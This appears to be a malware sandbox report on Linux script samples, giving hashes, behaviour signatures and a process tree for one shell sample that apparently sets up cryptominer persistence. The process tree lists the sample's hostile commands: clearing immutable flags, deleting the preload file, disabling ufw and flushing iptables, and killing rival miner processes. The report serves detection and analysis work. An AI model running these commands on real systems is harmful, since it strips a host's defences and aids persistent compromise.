Analysis
max time kernel: 530s
max time network: 1805s
platform: ubuntu-20.04_amd64
resource: ubuntu2004-amd64-20240221-en
resource tags: arch:amd64, arch:i386, image:ubuntu2004-amd64-20240221-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
submitted: 25-02-2024 14:29
Static task
static1
Behavioral task
behavioral1
Sample
script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral2
Sample
script_malware/1.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral3
Sample
script_malware/10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral4
Sample
script_malware/164f8295_linux.elf
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral5
Sample
script_malware/21162bbd796ad2bf9954265276bfebea8741596e8fe9d86070245d9b5f9db6da.elf
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral6
Sample
script_malware/23.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral7
Sample
script_malware/404
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral8
Sample
script_malware/864d7bcd96f8cf35b9e372b6508bc6ef1a704eaaa03c34bd79577b057aebec5b.py
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral9
Sample
script_malware/8e27b76b3903312cc5e93f250d7cf90b7b999592d70dcf2922bb450023014006.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral10
Sample
script_malware/SnOoPy.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral11
Sample
script_malware/a423a2a11c1904e42dc8630064e252ac4568220417a9ae072a557131e9386617.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral12
Sample
script_malware/a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral13
Sample
script_malware/aa5a487db37ce176e17c7abbb2b1d460ba926344e46737f2f64b65bf5a4a3e58.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral14
Sample
script_malware/ae4b7284a9538c66432f02097c3de14e2253d16b6602c4694753468bc14d7d28.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral15
Sample
script_malware/redtail.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral16
Sample
script_malware/rs.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral17
Sample
script_malware/setup.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral18
Sample
script_malware/shell.elf
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral19
Sample
script_malware/ta.sh
Resource
ubuntu2004-amd64-20240221-en
General
-
Target
script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
-
Size
11KB
-
MD5
07b7746b922cf7d7fa821123a226ed36
-
SHA1
bf2df8f2813ef4e2cf61ea193e091b808aa854c7
-
SHA256
063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1
-
SHA512
ad29993a88c996f96fdc5c01fda89400b1e27228c58445d181dc6af974a171ee36e014d90aa8e09de6d83e4bfd12d167eb361bd52b6d194af6f249a6812019cb
-
SSDEEP
192:Xws08k5tkd5DFPSV3n7/e867jNKvSbRXA8kWmk4lkCIkvUgoaES8DSWOlA+1esP:XQwL4/e867USbRXA8kWT4yCtvUgDjdWi
Malware Config
Signatures
-
Modifies the dynamic linker configuration file 1 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicious libraries with every executed process.
File opened for modification: /etc/ld.so.preload (process: 063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh)
Flushes firewall rules 2 IoCs
Flushes/disables firewall rules inside the Linux kernel.
PID 1481: ufw
PID 1679: iptables
IoC: /usr/lib/modules/5.4.0-169-generic/kernel/net/ipv6/netfilter/ip6_tables.ko (PID 1491, process: modprobe)
Reads EFI boot settings 2 IoCs
Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.
File opened for reading: /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 (process: systemctl)
File opened for reading: /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 (process: systemctl)
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Creates/modifies Cron job 1 TTPs 50 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Enumerates running processes
Discovers information about currently running processes on the system
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow 323: icanhazip.com
flow 324: icanhazip.com
Modifies systemd 1 TTPs 1 IoCs
Adds/modifies systemd service files, likely to achieve persistence.
File opened for modification: /lib/systemd/system/bot.service (process: 063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh)
Reads CPU attributes 1 TTPs 44 IoCs
File opened for reading: /sys/devices/system/cpu/online (process: pkill)
File opened for reading: /sys/devices/system/cpu/online (process: ps)
Enumerates kernel/hardware configuration 1 TTPs 4 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
File opened for reading: /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 (process: systemctl)
File opened for reading: /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 (process: systemctl)
File opened for reading: /sys/module/ip6_tables/initstate (process: modprobe)
File opened for reading: /sys/module/x_tables/initstate (process: modprobe)
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes
depth 1, PID 1476, /tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh: /tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh [Modifies the dynamic linker configuration file; Modifies systemd]
depth 2, PID 1477, /usr/bin/chattr: chattr -i /etc/ld.so.preload [Attempts to change immutable files]
depth 2, PID 1478, /usr/bin/rm: rm -f /etc/ld.so.preload
depth 2, PID 1479, /usr/bin/chattr: chattr -R -i /var/spool/cron [Attempts to change immutable files]
depth 2, PID 1480, /usr/bin/chattr: chattr -i /etc/crontab [Attempts to change immutable files]
depth 2, PID 1481, /usr/sbin/ufw: ufw disable [Flushes firewall rules]
depth 3, PID 1488, /usr/sbin/iptables: /usr/sbin/iptables -V
depth 3, PID 1489, /lib/ufw/ufw-init: /lib/ufw/ufw-init force-stop [Attempts to change immutable files]
depth 4, PID 1490, /sbin/ip6tables: ip6tables -L INPUT -n
depth 5, PID 1491, /sbin/modprobe: /sbin/modprobe ip6_tables [Loads a kernel module; Enumerates kernel/hardware configuration]
depth 4, PID 1493, /sbin/iptables: iptables -F ufw-logging-deny
depth 4, PID 1497, /sbin/iptables: iptables -F ufw-logging-allow
depth 4, PID 1498, /sbin/iptables: iptables -F ufw-not-local
depth 4, PID 1499, /sbin/iptables: iptables -F ufw-user-logging-input [Attempts to change immutable files]
depth 4, PID 1500, /sbin/iptables: iptables -F ufw-user-limit-accept
depth 4, PID 1501, /sbin/iptables: iptables -F ufw-user-limit
depth 4, PID 1502, /sbin/iptables: iptables -F ufw-skip-to-policy-input [Attempts to change immutable files]
depth 4, PID 1503, /sbin/iptables: iptables -F ufw-reject-input [Attempts to change immutable files]
depth 4, PID 1504, /sbin/iptables: iptables -F ufw-after-logging-input [Attempts to change immutable files]
depth 4, PID 1505, /sbin/iptables: iptables -F ufw-after-input [Attempts to change immutable files]
depth 4, PID 1506, /sbin/iptables: iptables -F ufw-user-input [Attempts to change immutable files]
depth 4, PID 1507, /sbin/iptables: iptables -F ufw-before-input [Attempts to change immutable files]
depth 4, PID 1508, /sbin/iptables: iptables -F ufw-before-logging-input [Attempts to change immutable files]
depth 4, PID 1509, /sbin/iptables: iptables -F ufw-skip-to-policy-forward
depth 4, PID 1510, /sbin/iptables: iptables -F ufw-reject-forward
depth 4, PID 1511, /sbin/iptables: iptables -F ufw-after-logging-forward
depth 4, PID 1512, /sbin/iptables: iptables -F ufw-after-forward
depth 4, PID 1513, /sbin/iptables: iptables -F ufw-user-logging-forward
depth 4, PID 1514, /sbin/iptables: iptables -F ufw-user-forward
depth 4, PID 1515, /sbin/iptables: iptables -F ufw-before-forward
depth 4, PID 1516, /sbin/iptables: iptables -F ufw-before-logging-forward
depth 4, PID 1517, /sbin/iptables: iptables -F ufw-track-forward
depth 4, PID 1518, /sbin/iptables: iptables -F ufw-track-output
depth 4, PID 1519, /sbin/iptables: iptables -F ufw-track-input [Attempts to change immutable files]
depth 4, PID 1520, /sbin/iptables: iptables -F ufw-skip-to-policy-output
depth 4, PID 1521, /sbin/iptables: iptables -F ufw-reject-output
depth 4, PID 1522, /sbin/iptables: iptables -F ufw-after-logging-output
depth 4, PID 1523, /sbin/iptables: iptables -F ufw-after-output
depth 4, PID 1524, /sbin/iptables: iptables -F ufw-user-logging-output
depth 4, PID 1525, /sbin/iptables: iptables -F ufw-user-output
depth 4, PID 1526, /sbin/iptables: iptables -F ufw-before-output
depth 4, PID 1527, /sbin/iptables: iptables -F ufw-before-logging-output
depth 4, PID 1528, /sbin/iptables: iptables -Z ufw-logging-deny
depth 4, PID 1529, /sbin/iptables: iptables -Z ufw-logging-allow
depth 4, PID 1530, /sbin/iptables: iptables -Z ufw-not-local
depth 4, PID 1531, /sbin/iptables: iptables -Z ufw-user-logging-input [Attempts to change immutable files]
depth 4, PID 1532, /sbin/iptables: iptables -Z ufw-user-limit-accept
depth 4, PID 1533, /sbin/iptables: iptables -Z ufw-user-limit
depth 4, PID 1534, /sbin/iptables: iptables -Z ufw-skip-to-policy-input [Attempts to change immutable files]
depth 4, PID 1535, /sbin/iptables: iptables -Z ufw-reject-input [Attempts to change immutable files]
depth 4, PID 1536, /sbin/iptables: iptables -Z ufw-after-logging-input [Attempts to change immutable files]
depth 4, PID 1537, /sbin/iptables: iptables -Z ufw-after-input [Attempts to change immutable files]
depth 4, PID 1538, /sbin/iptables: iptables -Z ufw-user-input [Attempts to change immutable files]
depth 4, PID 1539, /sbin/iptables: iptables -Z ufw-before-input [Attempts to change immutable files]
depth 4, PID 1540, /sbin/iptables: iptables -Z ufw-before-logging-input [Attempts to change immutable files]
depth 4, PID 1541, /sbin/iptables: iptables -Z ufw-skip-to-policy-forward
depth 4, PID 1542, /sbin/iptables: iptables -Z ufw-reject-forward
depth 4, PID 1543, /sbin/iptables: iptables -Z ufw-after-logging-forward
depth 4, PID 1544, /sbin/iptables: iptables -Z ufw-after-forward
depth 4, PID 1545, /sbin/iptables: iptables -Z ufw-user-logging-forward
depth 4, PID 1546, /sbin/iptables: iptables -Z ufw-user-forward
depth 4, PID 1547, /sbin/iptables: iptables -Z ufw-before-forward
depth 4, PID 1548, /sbin/iptables: iptables -Z ufw-before-logging-forward
depth 4, PID 1549, /sbin/iptables: iptables -Z ufw-track-forward
depth 4, PID 1550, /sbin/iptables: iptables -Z ufw-track-output
depth 4, PID 1552, /sbin/iptables: iptables -Z ufw-track-input [Attempts to change immutable files]
depth 4, PID 1553, /sbin/iptables: iptables -Z ufw-skip-to-policy-output
depth 4, PID 1554, /sbin/iptables: iptables -Z ufw-reject-output
depth 4, PID 1555, /sbin/iptables: iptables -Z ufw-after-logging-output
depth 4, PID 1557, /sbin/iptables: iptables -Z ufw-after-output
depth 4, PID 1558, /sbin/iptables: iptables -Z ufw-user-logging-output
depth 4, PID 1559, /sbin/iptables: iptables -Z ufw-user-output
depth 4, PID 1560, /sbin/iptables: iptables -Z ufw-before-output
depth 4, PID 1561, /sbin/iptables: iptables -Z ufw-before-logging-output
depth 4, PID 1562, /sbin/iptables: iptables -X ufw-logging-deny
depth 4, PID 1563, /sbin/iptables: iptables -X ufw-logging-allow
depth 4, PID 1564, /sbin/iptables: iptables -X ufw-not-local
depth 4, PID 1565, /sbin/iptables: iptables -X ufw-user-logging-input [Attempts to change immutable files]
depth 4, PID 1566, /sbin/iptables: iptables -X ufw-user-logging-output
depth 4, PID 1567, /sbin/iptables: iptables -X ufw-user-logging-forward
depth 4, PID 1568, /sbin/iptables: iptables -X ufw-user-limit-accept
depth 4, PID 1569, /sbin/iptables: iptables -X ufw-user-limit
depth 4, PID 1571, /sbin/iptables: iptables -X ufw-user-input [Attempts to change immutable files]
depth 4, PID 1573, /sbin/iptables: iptables -X ufw-user-forward
depth 4, PID 1574, /sbin/iptables: iptables -X ufw-user-output
depth 4, PID 1575, /sbin/iptables: iptables -X ufw-skip-to-policy-input [Attempts to change immutable files]
depth 4, PID 1576, /sbin/iptables: iptables -X ufw-skip-to-policy-output
depth 4, PID 1577, /sbin/iptables: iptables -X ufw-skip-to-policy-forward
depth 4, PID 1578, /sbin/iptables: iptables -P INPUT ACCEPT
depth 4, PID 1579, /sbin/iptables: iptables -P OUTPUT ACCEPT
depth 4, PID 1580, /sbin/iptables: iptables -P FORWARD ACCEPT
depth 4, PID 1581, /sbin/ip6tables: ip6tables -F ufw6-logging-deny
depth 4, PID 1582, /sbin/ip6tables: ip6tables -F ufw6-logging-allow
depth 4, PID 1583, /sbin/ip6tables: ip6tables -F ufw6-not-local
depth 4, PID 1584, /sbin/ip6tables: ip6tables -F ufw6-user-logging-input [Attempts to change immutable files]
depth 4, PID 1585, /sbin/ip6tables: ip6tables -F ufw6-user-limit-accept
depth 4, PID 1586, /sbin/ip6tables: ip6tables -F ufw6-user-limit
depth 4, PID 1587, /sbin/ip6tables: ip6tables -F ufw6-skip-to-policy-input [Attempts to change immutable files]
depth 4, PID 1588, /sbin/ip6tables: ip6tables -F ufw6-reject-input [Attempts to change immutable files]
depth 4, PID 1589, /sbin/ip6tables: ip6tables -F ufw6-after-logging-input [Attempts to change immutable files]
depth 4, PID 1590, /sbin/ip6tables: ip6tables -F ufw6-after-input [Attempts to change immutable files]
depth 4, PID 1591, /sbin/ip6tables: ip6tables -F ufw6-user-input [Attempts to change immutable files]
depth 4, PID 1592, /sbin/ip6tables: ip6tables -F ufw6-before-input [Attempts to change immutable files]
depth 4, PID 1593, /sbin/ip6tables: ip6tables -F ufw6-before-logging-input [Attempts to change immutable files]
depth 4, PID 1594, /sbin/ip6tables: ip6tables -F ufw6-skip-to-policy-forward
depth 4, PID 1595, /sbin/ip6tables: ip6tables -F ufw6-reject-forward
depth 4, PID 1596, /sbin/ip6tables: ip6tables -F ufw6-after-logging-forward
depth 4, PID 1597, /sbin/ip6tables: ip6tables -F ufw6-after-forward
depth 4, PID 1598, /sbin/ip6tables: ip6tables -F ufw6-user-logging-forward
depth 4, PID 1599, /sbin/ip6tables: ip6tables -F ufw6-user-forward
depth 4, PID 1600, /sbin/ip6tables: ip6tables -F ufw6-before-forward
depth 4, PID 1601, /sbin/ip6tables: ip6tables -F ufw6-before-logging-forward
depth 4, PID 1602, /sbin/ip6tables: ip6tables -F ufw6-track-forward
depth 4, PID 1603, /sbin/ip6tables: ip6tables -F ufw6-track-output
depth 4, PID 1604, /sbin/ip6tables: ip6tables -F ufw6-track-input [Attempts to change immutable files]
depth 4, PID 1605, /sbin/ip6tables: ip6tables -F ufw6-skip-to-policy-output
depth 4, PID 1606, /sbin/ip6tables: ip6tables -F ufw6-reject-output
depth 4, PID 1607, /sbin/ip6tables: ip6tables -F ufw6-after-logging-output
depth 4, PID 1608, /sbin/ip6tables: ip6tables -F ufw6-after-output
depth 4, PID 1609, /sbin/ip6tables: ip6tables -F ufw6-user-logging-output
depth 4, PID 1610, /sbin/ip6tables: ip6tables -F ufw6-user-output
depth 4, PID 1611, /sbin/ip6tables: ip6tables -F ufw6-before-output
depth 4, PID 1612, /sbin/ip6tables: ip6tables -F ufw6-before-logging-output
depth 4, PID 1613, /sbin/ip6tables: ip6tables -Z ufw6-logging-deny
depth 4, PID 1614, /sbin/ip6tables: ip6tables -Z ufw6-logging-allow
depth 4, PID 1615, /sbin/ip6tables: ip6tables -Z ufw6-not-local
depth 4, PID 1616, /sbin/ip6tables: ip6tables -Z ufw6-user-logging-input [Attempts to change immutable files]
depth 4, PID 1617, /sbin/ip6tables: ip6tables -Z ufw6-user-limit-accept
depth 4, PID 1618, /sbin/ip6tables: ip6tables -Z ufw6-user-limit
depth 4, PID 1619, /sbin/ip6tables: ip6tables -Z ufw6-skip-to-policy-input [Attempts to change immutable files]
depth 4, PID 1620, /sbin/ip6tables: ip6tables -Z ufw6-reject-input [Attempts to change immutable files]
depth 4, PID 1621, /sbin/ip6tables: ip6tables -Z ufw6-after-logging-input [Attempts to change immutable files]
depth 4, PID 1622, /sbin/ip6tables: ip6tables -Z ufw6-after-input [Attempts to change immutable files]
depth 4, PID 1623, /sbin/ip6tables: ip6tables -Z ufw6-user-input [Attempts to change immutable files]
depth 4, PID 1624, /sbin/ip6tables: ip6tables -Z ufw6-before-input [Attempts to change immutable files]
depth 4, PID 1625, /sbin/ip6tables: ip6tables -Z ufw6-before-logging-input [Attempts to change immutable files]
depth 4, PID 1626, /sbin/ip6tables: ip6tables -Z ufw6-skip-to-policy-forward
depth 4, PID 1627, /sbin/ip6tables: ip6tables -Z ufw6-reject-forward
depth 4, PID 1628, /sbin/ip6tables: ip6tables -Z ufw6-after-logging-forward
depth 4, PID 1629, /sbin/ip6tables: ip6tables -Z ufw6-after-forward
depth 4, PID 1630, /sbin/ip6tables: ip6tables -Z ufw6-user-logging-forward
depth 4, PID 1631, /sbin/ip6tables: ip6tables -Z ufw6-user-forward
depth 4, PID 1633, /sbin/ip6tables: ip6tables -Z ufw6-before-forward
depth 4, PID 1635, /sbin/ip6tables: ip6tables -Z ufw6-before-logging-forward
depth 4, PID 1636, /sbin/ip6tables: ip6tables -Z ufw6-track-forward
depth 4, PID 1638, /sbin/ip6tables: ip6tables -Z ufw6-track-output
depth 4, PID 1639, /sbin/ip6tables: ip6tables -Z ufw6-track-input [Attempts to change immutable files]
depth 4, PID 1641, /sbin/ip6tables: ip6tables -Z ufw6-skip-to-policy-output
depth 4, PID 1642, /sbin/ip6tables: ip6tables -Z ufw6-reject-output
depth 4, PID 1644, /sbin/ip6tables: ip6tables -Z ufw6-after-logging-output
depth 4, PID 1645, /sbin/ip6tables: ip6tables -Z ufw6-after-output
depth 4, PID 1647, /sbin/ip6tables: ip6tables -Z ufw6-user-logging-output
depth 4, PID 1648, /sbin/ip6tables: ip6tables -Z ufw6-user-output
depth 4, PID 1650, /sbin/ip6tables: ip6tables -Z ufw6-before-output
depth 4, PID 1651, /sbin/ip6tables: ip6tables -Z ufw6-before-logging-output
depth 4, PID 1653, /sbin/ip6tables: ip6tables -X ufw6-logging-deny
depth 4, PID 1654, /sbin/ip6tables: ip6tables -X ufw6-logging-allow
depth 4, PID 1655, /sbin/ip6tables: ip6tables -X ufw6-not-local
depth 4, PID 1657, /sbin/ip6tables: ip6tables -X ufw6-user-logging-input [Attempts to change immutable files]
depth 4, PID 1659, /sbin/ip6tables: ip6tables -X ufw6-user-logging-output
depth 4, PID 1660, /sbin/ip6tables: ip6tables -X ufw6-user-logging-forward
depth 4, PID 1662, /sbin/ip6tables: ip6tables -X ufw6-user-limit-accept
depth 4, PID 1664, /sbin/ip6tables: ip6tables -X ufw6-user-limit
depth 4, PID 1665, /sbin/ip6tables: ip6tables -X ufw6-user-input [Attempts to change immutable files]
depth 4, PID 1667, /sbin/ip6tables: ip6tables -X ufw6-user-forward
depth 4, PID 1668, /sbin/ip6tables: ip6tables -X ufw6-user-output
depth 4, PID 1670, /sbin/ip6tables: ip6tables -X ufw6-skip-to-policy-input [Attempts to change immutable files]
depth 4, PID 1671, /sbin/ip6tables: ip6tables -X ufw6-skip-to-policy-output
depth 4, PID 1673, /sbin/ip6tables: ip6tables -X ufw6-skip-to-policy-forward
depth 4, PID 1674, /sbin/ip6tables: ip6tables -P INPUT ACCEPT
depth 4, PID 1675, /sbin/ip6tables: ip6tables -P OUTPUT ACCEPT
depth 4, PID 1676, /sbin/ip6tables: ip6tables -P FORWARD ACCEPT
depth 2, PID 1679, /usr/sbin/iptables: iptables -F [Flushes firewall rules]
depth 2, PID 1680, /usr/bin/id: id -u
depth 2, PID 1684, /usr/bin/grep: grep -v grep
depth 2, PID 1683, /usr/bin/grep: grep -e /dev
depth 2, PID 1682, /usr/bin/ls: ls -la /etc
depth 2, PID 1694, /usr/bin/awk: awk "{if(\$3>80.0) print \$2}"
depth 2, PID 1693, /usr/bin/grep: grep -v grep
depth 2, PID 1692, /usr/bin/grep: grep agetty
depth 2, PID 1695, /usr/bin/xargs: xargs -I "%" kill -9 "%" [Attempts to change immutable files]
depth 2, PID 1691, /usr/bin/ps: ps aux [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1707, /usr/bin/pkill: pkill -f 42.112.28.216 [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1713, /usr/bin/xargs: xargs -I "%" kill -9 "%" [Attempts to change immutable files]
depth 2, PID 1712, /usr/bin/grep: grep -v -
depth 2, PID 1710, /usr/bin/awk: awk "{print \$7}"
depth 2, PID 1709, /usr/bin/grep: grep 207.38.87.6
depth 2, PID 1711, /usr/bin/awk: awk "-F[/]" "{print \$1}"
depth 2, PID 1718, /usr/bin/grep: grep -v -
depth 2, PID 1719, /usr/bin/xargs: xargs -I "%" kill -9 "%" [Attempts to change immutable files]
depth 2, PID 1716, /usr/bin/awk: awk "{print \$7}"
depth 2, PID 1717, /usr/bin/awk: awk "-F[/]" "{print \$1}"
depth 2, PID 1715, /usr/bin/grep: grep 127.0.0.1:52018
depth 2, PID 1725, /usr/bin/xargs: xargs -I "%" kill -9 "%" [Attempts to change immutable files]
depth 2, PID 1724, /usr/bin/grep: grep -v -
depth 2, PID 1723, /usr/bin/awk: awk "-F[/]" "{print \$1}"
depth 2, PID 1722, /usr/bin/awk: awk "{print \$7}"
depth 2, PID 1721, /usr/bin/grep: grep 34.81.218.76:9486
depth 2, PID 1731, /usr/bin/awk: awk "-F[/]" "{print \$1}"
depth 2, PID 1732, /usr/bin/grep: grep -v -
depth 2, PID 1733, /usr/bin/xargs: xargs -I "%" kill -9 "%" [Attempts to change immutable files]
depth 2, PID 1730, /usr/bin/awk: awk "{print \$7}"
depth 2, PID 1729, /usr/bin/grep: grep 42.112.28.216:9486
depth 2, PID 1736, /usr/bin/pkill: pkill -f .git/kthreaddw [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1738, /usr/bin/pkill: pkill -f 80.211.206.105 [Reads CPU attributes]
depth 2, PID 1740, /usr/bin/pkill: pkill -f 207.38.87.6 [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1751, /usr/bin/pkill: pkill -f p8444 [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1767, /usr/bin/pkill: pkill -f supportxmr [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1779, /usr/bin/pkill: pkill -f monero [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1780, /usr/bin/pkill: pkill -f kthreaddi [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1781, /usr/bin/pkill: pkill -f srv00 [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1782, /usr/bin/pkill: pkill -f /tmp/.javae/javae [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1783, /usr/bin/pkill: pkill -f .javae [Reads CPU attributes]
depth 2, PID 1784, /usr/bin/pkill: pkill -f .syna [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1785, /usr/bin/pkill: pkill -f .main [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1786, /usr/bin/pkill: pkill -f xmm [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1787, /usr/bin/pkill: pkill -f solr.sh [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1788, /usr/bin/pkill: pkill -f /tmp/.solr/solrd [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1789, /usr/bin/pkill: pkill -f /tmp/javac [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1790, /usr/bin/pkill: pkill -f /tmp/.go.sh [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1791, /usr/bin/pkill: pkill -f /tmp/.x/agetty [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1792, /usr/bin/pkill: pkill -f /tmp/.x/kworker [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1793, /usr/bin/pkill: pkill -f c3pool [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1794, /usr/bin/pkill: pkill -f /tmp/.X11-unix/gitag-ssh [Reads CPU attributes]
depth 2, PID 1795, /usr/bin/pkill: pkill -f /tmp/1 [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1796, /usr/bin/pkill: pkill -f /tmp/okk.sh [Reads CPU attributes]
depth 2, PID 1797, /usr/bin/pkill: pkill -f /tmp/gitaly [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1798, /usr/bin/pkill: pkill -f /tmp/.x/kworker [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1799, /usr/bin/pkill: pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1800, /usr/bin/pkill: pkill -f /tmp/.X11-unix/supervise [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1801, /usr/bin/pkill: pkill -f /tmp/.ssh/redis.sh [Reads CPU attributes; Reads runtime system information]
depth 2, PID 1805, /usr/bin/awk: awk "{print \$2}"
depth 2, PID 1804, /usr/bin/grep: grep -v grep
depth 2, PID 1806, /usr/bin/xargs: xargs -I "%" kill -9 "%" [Attempts to change immutable files]
depth 2, PID 1803, /usr/bin/grep: grep ./udp
-
-
/usr/bin/psps aux2⤵
- Reads CPU attributes
PID:1802
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1808
-
-
/usr/bin/catcat /tmp/.X11-unix/012⤵PID:1807
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1810
-
-
/usr/bin/catcat /tmp/.X11-unix/112⤵PID:1809
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1812
-
-
/usr/bin/catcat /tmp/.X11-unix/222⤵PID:1811
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1814
-
-
/usr/bin/catcat /tmp/.pg_stat.02⤵PID:1813
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1816
-
-
/usr/bin/catcat /tmp/.pg_stat.12⤵PID:1815
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1818
-
-
/usr/bin/catcat /data/./oka.pid2⤵PID:1817
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1819
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1820
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1821
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1822
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
PID:1823
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1824
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1825
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1830
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1829
-
-
/usr/bin/grepgrep -v grep2⤵PID:1828
-
-
/usr/bin/grepgrep ./oka2⤵PID:1827
-
-
/usr/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1826
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1835
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1834
-
-
/usr/bin/grepgrep -v grep2⤵PID:1833
-
-
/usr/bin/grepgrep "postgres: autovacum"2⤵PID:1832
-
-
/usr/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1831
-
-
/usr/bin/grepgrep -v proxymap2⤵PID:1842
-
-
/usr/bin/grepgrep -v postgres2⤵PID:1843
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1847
-
-
/usr/bin/grepgrep -v postgrey2⤵PID:1844
-
-
/usr/bin/grepgrep -v kinsing2⤵PID:1845
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1846
-
-
/usr/bin/grepgrep -v php-fpm2⤵PID:1841
-
-
/usr/bin/grepgrep -v "("2⤵PID:1840
-
-
/usr/bin/grepgrep -v "\\["2⤵PID:1839
-
-
/usr/bin/grepgrep -v bin2⤵PID:1838
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1837
-
-
/usr/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1836
-
-
/usr/bin/grepgrep -v proxymap2⤵PID:1854
-
-
/usr/bin/grepgrep -v postgres2⤵PID:1855
-
-
/usr/bin/grepgrep -v postgrey2⤵PID:1856
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1857
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1858
-
